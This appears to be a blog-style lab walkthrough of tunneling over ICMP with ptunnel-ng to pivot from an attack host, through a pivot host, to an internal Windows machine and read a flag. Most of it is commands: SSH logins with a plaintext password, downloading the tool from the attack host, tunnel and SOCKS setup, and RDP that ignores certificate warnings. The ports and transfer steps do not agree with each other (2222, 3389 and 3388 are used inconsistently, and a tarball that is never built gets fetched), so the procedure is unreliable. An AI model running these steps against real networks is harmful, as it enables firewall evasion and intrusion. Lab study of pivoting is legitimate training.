ICMP Tunneling with ptunnel-ng to Access Internal Windows Host

Posted Jun 18, 2025 Updated Jun 23, 2025

By saramazal

1 min read

🛰️ ICMP Tunneling with ptunnel-ng & SOCKS: Pivot to WinTarget

In this lab, we demonstrate how to use ptunnel-ng to establish an ICMP-based tunnel from an Attack Host to a Pivot Host, and then pivot further to a Windows Target to retrieve a flag.

🔧 Environment Setup

        
      
# Set Environment Variables
export AttackHost=10.10.xx.xx
export PivotHost=10.129.xx.xx
export WinTargetIp=172.16.xx.xx

export username=ubuntu
export passwd='pivotpass123'

export winuser=winuser
export winpasswd='pass@123'

🐚 Access Pivot Host

        
# Using sshpass to connect
sshpass -p "$passwd" ssh $username@$PivotHost

🛠️ Clone & Build ptunnel-ng

        
      
# On Attack Host
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/
sudo apt install automake autoconf -y

# Patch autogen.sh for static build
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh

./autogen.sh

📦 Transfer to Pivot Host

# On Pivot Host:
python3 -m http.server 8123

        
      
# Serve files from Attack Host. On Pivot Host:
wget http://$AttackHost:8123/ptunnel-ng.tar.gz
tar -xvzf ptunnel-ng.tar.gz

Or using SCP:

        
# Serve files from Attack Host. On Pivot Host:
scp -r ptunnel-ng $username@$PivotHost:~/

📡 Start ptunnel-ng Server on Pivot

        
      
# On Pivot Host
cd ~/ptunnel-ng/src
sudo ./ptunnel-ng -r$WinTargetIp -R3389

🔁 Start ptunnel-ng Client on Attack Host

        
      
# On Attack Host
cd ptunnel-ng/src
sudo ./ptunnel-ng -p$PivotHost -l2222 -r$WinTargetIp -R3389

🧠 Connect via SSH or SOCKS

        
# Option 1: Direct tunnel to pivot (useful for shell)
ssh -p2222 -l$username 127.0.0.1

# Option 2: Dynamic SOCKS proxy
ssh -D 9050 -p2222 -l$username 127.0.0.1

🖥️ Access WinTarget via RDP

xfreerdp /v:127.0.0.1:3388 /u:$winuser /p:$winpasswd

If prompted with cert warnings, ignore them using:

xfreerdp /v:127.0.0.1:3388 /u:$winuser /p:$winpasswd /cert-ignore

🏁 Retrieve the Flag

Once connected to the desktop or through shell access, retrieve:

type C:\Users\winuser\Downloads\flag.txt

✅ Success!

You’ve successfully tunneled through ICMP from your Attack Box to the DC, bypassing traditional firewall rules. This technique is stealthy and powerful in restricted environments.

Stay sneaky, stay ethical. 🕶️

~ Maz4l 🤺

Pivoting

pivoting tunelling ptunnel-ng rce xfreerdp ssh sshpass scp python server

This post is licensed under CC BY 4.0 by the author.